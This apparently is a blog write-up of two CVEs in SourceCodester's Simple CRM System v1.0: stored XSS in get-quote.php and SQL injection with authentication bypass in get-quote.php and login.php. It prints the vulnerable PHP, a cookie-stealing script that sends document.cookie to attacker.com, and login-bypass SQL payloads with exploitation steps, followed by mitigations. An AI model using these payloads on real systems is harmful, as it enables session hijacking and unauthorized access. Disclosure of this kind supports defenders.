CVE-2023-24203-and-CVE-2023-24204

Introduction

In the ever-evolving landscape of cybersecurity, web applications remain a prime target for attackers seeking to exploit vulnerabilities. Recently, two critical vulnerabilities were discovered in the SourceCodester Simple Customer Relationship Management (CRM) System v1.0: CVE-2023-24203 and CVE-2023-24204. These vulnerabilities, involving Cross-Site Scripting (XSS) and SQL Injection, pose significant risks including arbitrary code execution and unauthorized access. Understanding these vulnerabilities and their impacts is essential for developers and security professionals to safeguard systems from potential threats.

Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) is a type of vulnerability that occurs when a web application allows users to inject malicious scripts into web pages viewed by other users. This can lead to unauthorized actions on behalf of the user, data theft, and further exploitation. XSS vulnerabilities can be classified into three main types:

1. Stored XSS: The malicious script is permanently stored on the target server, such as in a database, message forum, or comment field.
2. Reflected XSS: The malicious script is reflected off a web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server.
3. DOM-based XSS: The vulnerability exists in client-side code rather than server-side code.

SQL Injection

SQL Injection is a type of vulnerability that occurs when an attacker is able to manipulate SQL queries by injecting arbitrary SQL code into a query. This can lead to unauthorized access, data theft, and other malicious activities. SQL Injection typically occurs due to insufficient input validation and lack of parameterized queries. Key impacts of SQL Injection include:

1. Unauthorized Access: Attackers can bypass authentication mechanisms to gain unauthorized access to a system.
2. Data Theft: Attackers can exfiltrate sensitive information from the database.
3. Data Manipulation: Attackers can alter, insert, or delete data within the database.

In this blog post, we will delve into CVE-2023-24203 and CVE-2023-24204, exploring the specifics of these vulnerabilities, their attack vectors, impacts, and mitigation strategies. Understanding these vulnerabilities in depth is crucial for protecting your applications and data from potential exploits.

Common Causes of SQL Injection in Web Applications

SQL Injection vulnerabilities are often a result of inadequate input validation and poor coding practices. Some common causes include:

1. Lack of Parameterized Queries: Failing to use parameterized queries allows attackers to inject malicious SQL code into a query string.
2. Inadequate Input Validation: Not properly validating user inputs can lead to the execution of unintended SQL commands.
3. Dynamic SQL Queries: Building SQL queries dynamically by concatenating strings directly from user inputs can create exploitable vulnerabilities.
4. Insufficient Escaping of User Inputs: Not properly escaping special characters in user inputs can allow SQL injection attacks.
5. Legacy Code: Older codebases may not follow modern security practices, making them more susceptible to SQL injection.

Common Causes of XSS in Web Applications

Cross-Site Scripting (XSS) vulnerabilities are typically caused by the failure to properly handle user input and output. Common causes include:

1. Improper Output Encoding: Failing to encode user input before displaying it on web pages can allow the injection of malicious scripts.
2. Inadequate Input Validation: Not validating or sanitizing user inputs can lead to the execution of injected scripts.
3. Reflected User Inputs: Reflecting user inputs directly in responses without proper validation or encoding can result in reflected XSS.
4. Stored User Inputs: Storing user inputs without proper sanitization can lead to stored XSS attacks.
5. DOM Manipulation: Insecure manipulation of the Document Object Model (DOM) based on user inputs can result in DOM-based XSS.

CVE-2023-24203: Finding a Stored XSS!

Vulnerability Summary

CVE-2023-24203 is a Stored Cross-Site Scripting (XSS) vulnerability found in the get-quote.php component of the SourceCodester Simple Customer Relationship Management (CRM) System v1.0. This vulnerability allows an attacker to inject malicious scripts into the company and query parameters, which are then stored in the database and executed when viewed by an administrator, leading to arbitrary code execution.

Vulnerability Details

The vulnerability resides in the get-quote.php script, which processes user input from a quote request form. The PHP source code is shown below:

<?php
session_start();
include("dbconnection.php");
include("checklogin.php");
check_login();
error_reporting(0);
if(isset($_POST['submit']))
{
    $name=$_POST['name'];
    $email=$_POST['email'];
    $contact=$_POST['contact'];
    $company=$_POST['company'];
    $services=addslashes(mysqli_real_escape_string($con, json_encode($_POST['services'])));
    $other=$_POST['other'];
    $query=$_POST['query'];
    $pd=date('Y-m-d');
    mysqli_query($con,"insert into prequest(name,email,contactno,company,services,others,query,posting_date) values('$name','$email','$contact','$company','$services','$other','$query','$pd')");
    echo "<script>alert('Query received. We will contact you soon.');</script>";  
    echo "<script>window.location.href='get-quote.php'</script>";
}
?>

The script takes user inputs from the form (name, email, contact, company, services, other, and query) and directly incorporates them into an SQL query to store the data in the database. While the services input is sanitized using mysqli_real_escape_string and addslashes, the company and query parameters are not properly sanitized or encoded when being echoed back in the response. This lack of proper sanitization and encoding allows for the injection and storage of malicious scripts in the database.

Exploitation

To exploit this vulnerability, an attacker can craft a payload that includes malicious JavaScript code in the company or query parameter. When the administrator views the quote request, the injected script will execute in their browser.

Example Exploit Payload

By submitting the following payload in the query parameter:

<script>alert('XSS');</script>

The attacker can trigger an XSS attack when the administrator views the quote request.

Stealing Admin Cookies

A more harmful payload can be crafted to steal the administrator’s session cookies. By using the following payload in the query parameter:

<script>document.location='http://attacker.com/steal-cookie?cookie='+document.cookie;</script>

The attacker can send the administrator’s cookies to a remote server controlled by the attacker.

Steps to Exploit

Submit Malicious Quote Request: The attacker fills out the quote request form, injecting the malicious payload into the company or query field.

<form method="post" action="get-quote.php">
    <input type="text" name="company" value="CompanyX"><br>
    <input type="text" name="query" value="<script>document.location='http://attacker.com/steal-cookie?cookie='+document.cookie;</script>"><br>
    <input type="submit" name="submit" value="Submit">
</form>

Administrator Views Request: When the administrator logs into the CRM system and views the submitted quote, the malicious script executes in their browser, sending their session cookies to the attacker’s server.

Impact

Successful exploitation of this stored XSS vulnerability allows an attacker to execute arbitrary JavaScript in the context of the administrator’s browser. This can lead to various malicious actions, including:

Stealing session cookies Hijacking user sessions Performing unauthorized actions on behalf of the administrator Redirecting the administrator to malicious websites

Mitigation

To mitigate this vulnerability, it is essential to sanitize and encode all user inputs before incorporating them into the web page. Specifically:

Sanitize Inputs: Use functions like htmlspecialchars() to encode special characters in user inputs. Validate Inputs: Implement strict input validation to ensure that only expected data is accepted. Content Security Policy (CSP): Use CSP headers to restrict the sources from which scripts can be loaded and executed.

CVE-2023-24204: Finding a SQL Injection and Auth Bypass!

CVE-2023-24204 is an SQL Injection vulnerability found in the get-quote.php and login.php components of the SourceCodester Simple Customer Relationship Management (CRM) System v1.0. This vulnerability allows an attacker to inject arbitrary SQL commands into the database, potentially leading to unauthorized access and data manipulation.

Vulnerability Details

The SQL Injection vulnerability is present in both the get-quote.php and admin/login.php scripts. Below is an analysis of how these vulnerabilities manifest and can be exploited.

get-quote.php

The get-quote.php script processes user input from a quote request form. The source code is shown below:

<?php
session_start();
include("dbconnection.php");
include("checklogin.php");
check_login();
error_reporting(0);
if(isset($_POST['submit']))
{
    $name=$_POST['name'];
    $email=$_POST['email'];
    $contact=$_POST['contact'];
    $company=$_POST['company'];
    $services=addslashes(mysqli_real_escape_string($con, json_encode($_POST['services'])));
    $other=$_POST['other'];
    $query=$_POST['query'];
    $pd=date('Y-m-d');
    mysqli_query($con,"insert into prequest(name,email,contactno,company,services,others,query,posting_date) values('$name','$email','$contact','$company','$services','$other','$query','$pd')");
    echo "<script>alert('Query received. We will contact you soon.');</script>";  
    echo "<script>window.location.href='get-quote.php'</script>";
}
?>

And let’s also take a look at the login.php source code logic.

<?php
session_start();
error_reporting(0);
include("dbconnection.php");
if(isset($_POST['login']))
{
$ret=mysqli_query($con,"SELECT * FROM user WHERE email='".$_POST['email']."' and password='".$_POST['password']."'");
$num=mysqli_fetch_array($ret);
if($num>0)
{
$_SESSION['login']=$_POST['email'];
$_SESSION['id']=$num['id'];
$_SESSION['name']=$num['name'];
$val3 =date("Y/m/d");
date_default_timezone_set("Asia/Calcutta");
$time=date("h:i:sa");
$tim = $time;
$ip_address=$_SERVER['REMOTE_ADDR'];
$geopluginURL='http://www.geoplugin.net/php.gp?ip='.$ip_address;
$addrDetailsArr = unserialize(file_get_contents($geopluginURL)); 
$city = $addrDetailsArr['geoplugin_city']; 
$country = $addrDetailsArr['geoplugin_countryName'];
ob_start();
system('ipconfig /all');
$mycom=ob_get_contents();
ob_clean();
$findme = "Physical";
$pmac = strpos($mycom, $findme);
$mac=substr($mycom,($pmac+36),17);
$ret=mysqli_query($con,"insert into usercheck(logindate,logintime,user_id,username,email,ip,mac,city,country)values('".$val3."','".$tim."','".$_SESSION['id']."','".$_SESSION['name']."','".$_SESSION['login']."','$ip_address','$mac','$city','$country')");

$extra="dashboard.php";
echo "<script>window.location.href='".$extra."'</script>";
exit();
}
else
{
$_SESSION['action1']="Invalid username or password";
$extra="login.php";

echo "<script>window.location.href='".$extra."'</script>";
exit();
}
}
?>

Vulnerability Analysis

The get-quote.php script does not adequately sanitize the name parameter. An attacker can intercept the request using a tool like Burp Suite, modify the name parameter, and inject malicious SQL commands.

The login.php script is vulnerable to authentication bypass due to the lack of proper input validation on the email and password fields. An attacker can use a payload such as hack’ or 1=1;# to bypass authentication and gain access.

Exploitation

1. Exploiting get-quote.php
2. Intercept the Request: Use a proxy tool like Burp Suite to intercept the form submission request.
3. Modify the name Parameter: Inject malicious SQL commands into the name parameter. For example:

’ OR ‘1’=‘1’;–

4. Submit the Modified Request: Send the modified request to the server. The injected SQL command will be executed by the database.

5. Exploiting login.php

6. Navigate to the Login Page: Go to the login.php page.

7. Enter Malicious Payload: Use a payload such as hack’ or 1=1;# in the email field and any string in the password field.

4. Bypass Authentication: Submit the form. The payload bypasses authentication, granting access to the account.

Impact

Successful exploitation of these SQL Injection vulnerabilities can lead to various malicious actions, including:

Unauthorized Access: Attackers can gain administrative access to the system. Data Theft: Attackers can exfiltrate sensitive information from the database. Data Manipulation: Attackers can alter, insert, or delete data within the database. Mitigation To mitigate these vulnerabilities, it is essential to implement proper input validation and use parameterized queries. Specifically:

Use Prepared Statements: Implement parameterized queries to prevent SQL injection. Validate Inputs: Apply strict input validation to ensure that only expected data is accepted. Escape Inputs: Properly escape all user inputs before using them in SQL queries. By following these best practices, you can significantly reduce the risk of SQL Injection attacks and protect your web application from potential exploitation.